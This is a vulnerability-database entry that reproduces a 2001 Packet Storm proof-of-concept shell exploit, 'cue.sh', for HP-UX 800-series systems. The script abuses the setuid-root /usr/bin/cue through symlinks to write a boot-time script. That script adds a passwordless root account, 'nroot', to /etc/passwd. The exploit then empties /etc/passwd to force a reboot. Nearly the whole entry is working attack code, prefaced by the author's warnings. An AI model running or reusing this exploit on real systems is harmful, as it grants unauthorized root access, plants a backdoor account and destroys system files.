Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cue.sh

🗓️ 08 Jun 2001 00:00:00Reported by Emilie ChangType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Dangerous script for proof of concept. Requires careful code review before execution.

Code
`#!/usr/bin/ksh  
  
##  
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!  
##  
## This is just a proof of concept. Don't use for malicious  
## purpose. If ever you decide to run that script, please  
## read the code carefully before!  
##  
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT  
## people. Good job sweethearts.  
##  
## Old-styled exploit, tested on HPUX 10.20, model 899  
## Warning : /usr/bin/cue exists on HPUX 800 models only  
##  
## Let's test the model by the way...  
##  
  
MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`  
export MODEL  
  
if [ $MODEL -lt 800 -o $MODEL -gt 899 ]  
then  
echo "Your host doesn't look like a HPuX 8** model, stopping now."  
exit  
fi  
  
##  
## Test whether /usr/bin/cue exists or not...  
##  
  
if [ ! -u /usr/bin/cue ]  
then  
echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."  
exit  
fi  
  
##  
## Well you passed the above tests. Going on playing.  
## Creating a file within /etc/rc.config.d : It will  
## be executed at next reboot (which might happen  
## soon)  
##  
  
TTY=`tty | awk -F '/' '{print $3}'`  
export TTY  
  
TERM=whatevah  
export TERM  
  
umask 000  
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## Inserting evil root account within /etc/passwd  
##  
  
echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit  
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit  
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit  
  
##  
## Now saving the passwd file, which we are about to empty  
##   
  
cp /etc/passwd /tmp/passwd  
  
##  
## passwd file destruction  
## (SOMEONE SET US UP THE BOMB !!)  
##  
  
rm IDMERROR.$TTY  
ln -s /etc/passwd IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## *POOF*, now that the /etc/passwd file is emptied, admin  
## MUST reboot to get things done.  
##  
  
echo "Your nroot account will be created within /etc/passwd"  
echo "with no password. Remove it asap, it's just a proof"  
echo "of concept!"  
  
# The end.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jun 2001 00:00Current
7.4High risk
Vulners AI Score7.4
dangerous scriptproof of conceptrisk assessmentsecurity vulnerabilityhpux model requirementexploit testing
23